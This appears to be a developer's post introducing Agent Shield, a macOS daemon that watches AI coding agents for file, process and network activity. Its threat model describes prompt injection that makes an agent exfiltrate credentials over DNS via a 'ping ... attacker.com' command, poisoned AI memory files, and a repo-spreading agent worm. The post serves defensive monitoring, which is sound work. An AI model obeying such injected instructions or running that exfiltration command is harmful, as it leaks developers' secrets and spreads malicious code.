A few months ago I realized I had no idea what Claude Code was doing on my machine between keystrokes. I knew it had filesystem access. I knew it made network calls. But I had no visibility: which files it was reading, what subprocesses it was spawning, whether it had ever touched my .env or ~/.ssh. That bothered me enough that I built something to find out.

The result is Agent Shield — a background daemon that watches AI coding tools (Claude Code, Cursor, Cline, Copilot, Codex) at the OS level using macOS FSEvents, lsof, and subprocess tree polling. All event data stays in a local SQLite database.

Privacy note: If you set ANTHROPIC_API_KEY, the AI incident investigator activates and sends event context — process names, file paths, hostnames, and IP addresses — to the Claude API to generate incident reports. Nothing else leaves the machine. You can disable the AI analyst in Settings to run entirely on-device.

The threat model is concrete

Three attacks shaped the design:

CVE-2025-55284 — prompt injection causes Claude Code to run ping $(base64-encoded-credentials).attacker.com. Your API keys leave via DNS — invisible to any HTTPS-layer proxy watching your network traffic.

SpAIware (Windsurf, August 2025) — malicious content injected into AI memory files. Every future session silently exfiltrates data before doing any work. The injection point is a file, not a network request.

AgentHopper — AI reads a malicious repo, injects payloads into local source files, git pushes to spread, infects the next developer's AI agent. No single event looks alarming; the sequence is: file read → file write → git push.

That last one is why the cross-event correlation engine exists. The system stores a rolling event window per process and flags sequences. Each event alone is normal. The pattern is not.

Why not a network proxy

Every existing tool I looked at — CodeGate, Pipelock, and Sysdig's announcement this week — sits in the network path and inspects API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration via ping. It can't monitor what the AI writes to its own memory directories, which is where SpAIware lives.

The attack surface isn't the API layer. It's the OS.

What's built

macOS FSEvents file watcher (real-time, no polling), subprocess tree monitoring, network classification Two-phase scanning: fast regex first, Claude API only on regex hits (keeps cost low) SpAIware detection — FSEvents watcher on AI memory directories (~/.claude/, ~/.cursor/, etc.) Cross-event sequence detection (cred read → unknown network → git push) MCP server allowlisting and discovery Policy enforcement: kill/suspend/block on confirmed threats (opt-in, monitor-only by default) Weekly threat intel refresh via a research agent (Exa + Claude) Web dashboard at localhost:6080, menu bar app Honest limitations

macOS only — FSEvents is Apple-specific. Python daemon, not a polished installer yet. Going open source (MIT) as part of this release.